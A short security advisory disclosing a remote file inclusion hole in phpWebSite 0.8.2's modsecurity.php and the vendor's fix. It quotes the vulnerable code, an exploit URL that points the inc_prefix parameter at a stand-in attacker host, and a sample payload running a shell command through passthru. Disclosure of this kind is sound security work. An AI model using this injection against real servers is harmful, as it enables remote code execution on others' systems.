--------------------------------------
| PHP source injection in phpWebSite |
--------------------------------------
Product Description
===================
phpWebSite is written in the PHP Programming Language,
making it ideal for developers to write customized
plug-ins. PHP is a server side programming language
that is simple, cross-platform, and fast. It can be
found at http://phpwebsite.appstate.edu
Tested version
==============
Stable - 0.8.2 (modsecurity.php version < 1.10)
The Problem
===========
phpWebSite commes with a file called
modsecurity.php, and looks like this:
-------- modsecurity.php --------
<?php
global $inc_prefix;
if(!$inc_prefix) {
...
}
...
include_once($inc_prefix."htmlheader.php");
?>
----------------------------------
If someone request a URL like
http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/,
the htmlheader.php file from MYBOX would be included,
and the attacker would be able to include any code he
wants.
Examples
========
http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
--- htmlheader.php ---
<? passthru("/bin/ls") ?>
----------------------
Output: dir listing of the current dierctory
Sollution
=========
I informed the vendor and they released a new version (1.11)
of the modsecurity.php file wich is avaiable from:
http://res1.stddev.appstate.edu/horde/chora/cvs.php/phpwebsite
A new version (0.8.3) is released so this vulnerability so new users will
never have a modsecurity.php file older then version 1.11
------------------------------
Tim Vandermeersch
[EMAIL PROTECTED]
http://users.pandora.be/tim/
